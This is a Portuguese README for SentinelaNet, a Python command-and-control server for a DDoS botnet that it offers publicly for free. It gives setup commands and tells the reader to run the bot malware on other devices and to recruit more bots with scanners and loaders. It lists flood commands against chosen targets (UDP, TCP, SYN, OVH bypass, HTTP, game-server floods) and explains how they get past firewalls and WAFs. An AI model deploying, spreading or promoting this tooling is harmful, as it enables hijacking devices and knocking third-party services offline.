SentinelaNet é uma CNC (Comando e Controle) em Python, projetada para gerenciar um malware que realiza ataques de disparos em massa (DDoS).
Esta Botnet é para ser uma versão aprimorada do KryptonC2 e será disponibilizada publicamente e de forma gratuita.
git clone https://github.com/CirqueiraDev/SentinelaNet
cd SentinelaNet
pip install colorama
python3 cnc.py 1337
Os logins são salvos em logins.txt no formato "username:password" dentro do arquivo logins.txt
-
Mude o IP e a porta do bot.py com o IP (IP publico se não for um teste local) e a porta do seu servidor CNC depois salve o arquivo.
-
Depois execute o malware em outro dispositivo que suporte python (caso o alvo não tenha o python você pode tentar compilar o malware)
-
Tente usar Scanners e Loaders para carregar mais bots. OBS: não é possivel gerar um binario TOTALMENTE estático com python PURO!
Command | Description |
---|---|
!admin, !adm | Shows list of admin commands |
!user, !u | Add/List/Remove users |
!blacklist, !bl | Add/List/Remove blacklisted targets |
Command | Description |
---|---|
help, ? | Shows list of commands |
botnet | Shows list of botnet attack methods |
bots | Shows all conected bots |
stop | Stop all your floods in progress |
clear, cls | Clears the console window screen |
exit, logout | Disconnects from the C&C server |
Command | Usage | Description |
---|---|---|
.UDP | <target> <port> <time> | Starts UDP Flood Bypass |
.TCP | <target> <port> <time> | Starts TCP Flood Bypass |
.OVHUDP | <target> <port> <time> | Starts OVH UDP Flood Bypass |
.OVHTCP | <target> <port> <time> | Starts OVH TCP Flood Bypass |
.MIX | <target> <port> <time> | Starts TCP and UDP Flood Bypass |
.SYN | <target> <port> <time> | Starts TCP SYN Flood |
.HEX | <target> <port> <time> | Starts HEXdecimal Flood |
.VSE | <target> <port> <time> | Send Valve Source Engine Protocol |
.MCPE | <target> <port> <time> | Minecraft PE Status Ping Protocol |
.FIVEM | <target> <port> <time> | Send FiveM Status Ping Protocol |
.HTTPGET | <target> <port> <time> | Starts HTTP/1.1 GET Flood |
.HTTPPOST | <target> <port> <time> | Starts HTTP/1.1 POST Flood |
.BROWSER | <target> <port> <time> | Starts HTTP/1.1 BROWSER Simulator Flood |
- Envia pacotes UDP de tamanhos variados para sobrecarregar o alvo.
- Pode ser mitigado por firewalls e rate-limiting de ISPs.
- Envia pacotes TCP continuamente para esgotar conexões do alvo.
- Se não houver handshake adequado, pode ser bloqueado facilmente.
- Envia requisições SYN para exaurir conexões TCP pendentes.
- Eficaz contra servidores mal protegidos.
- Firewalls modernos usam SYN Cookies para mitigar.
- Alterna entre TCP e UDP para confundir defesas.
- Pode evitar filtros estáticos, mas ainda é detectável por análise comportamental.
- Envia requisições HTTP falsas (PGET) com caminhos anômalos (/0/0/0/0, \0\0\0\0).
- Aleatoriza bytes (0x00 a 0xFF) e terminadores de linha para burlar WAFs.
- Usa múltiplas conexões TCP (connect, connect_ex) para saturar o servidor.
- Mitigação: Firewalls com filtro de métodos HTTP inválidos e rate-limiting.
- Inunda a porta alvo com datagramas UDP contendo payloads aleatórios (até 2048 bytes).
- Não requer handshake, dificultando rastreamento.
- Eficaz contra serviços UDP expostos (DNS, VoIP).
- Mitigação: Bloqueio de tráfego UDP não essencial e análise comportamental.
- Combina
attack_ovh_tcp
eattack_ovh_udp
em threads paralelas. - Objetivo: Confundir defesas estáticas (ex: firewalls que bloqueiam apenas TCP).
- Mitigação: Soluções anti-DDoS com detecção de padrões híbridos (ex: Cloudflare).
- Simula acessos massivos a um site para sobrecarregar o servidor.
- Pode ser mitigado por CAPTCHA, Cloudflare e Rate-Limiting.
- Simula envio de dados para consumir processamento do servidor.
- Mais difícil de mitigar que GET, mas pode ser bloqueado com autenticação ou regras de firewall.
- Simula tráfego de um navegador real para burlar proteções básicas.
- Pode enganar bloqueios simples, mas não funciona contra defesas avançadas.
- Explora vulnerabilidades no protocolo de comunicação do FiveM.
- FiveM tem melhorado suas proteções, mas servidores mal configurados ainda podem ser afetados.
- Envia pacotes corrompidos para explorar falhas na rede do jogo.
- Pode afetar servidores sem proteção adequada, mas padrões desse ataque já são bloqueados em alguns serviços.
- Explora o protocolo de consulta de servidores de jogos para gerar carga excessiva.
- Muito utilizado contra servidores Source Engine (CS:GO, TF2, etc.).
-
Atualizado CNC
- Adicionado blacklist
01/03/2025
- Atulizado comando bots
02/05/2025
- Agora o comando
bots
exibe a quantidade de bots atualmente conectados ao C2, e organizados por arquitetura do sistema (por exemplo:x86_64
,arm
,mips
) (também mostra a quantidade em cada arquitetura).
- Agora o comando
- Comando STOP adicionado
09/05/2025
- Adicionado blacklist
-
Atualizado Payload
- Atualizado Browser Flood
01/03/2025
- Atualizado UDP Flood Bypass
06/03/2025
- Atualizado UDP Flood removed
06/03/2025
- Adicionado TCP and UDP Flood Bypass
07/03/2025
- Atualizado SYN Flood
07/03/2025
- Adicionado OVHUDP and OVHTCP Flood Bypass
04/05/2025
- OVH BUILDER Fixed
09/05/2025
- Atualizado Browser Flood
- Discord: Cirqueira
- Meu instagram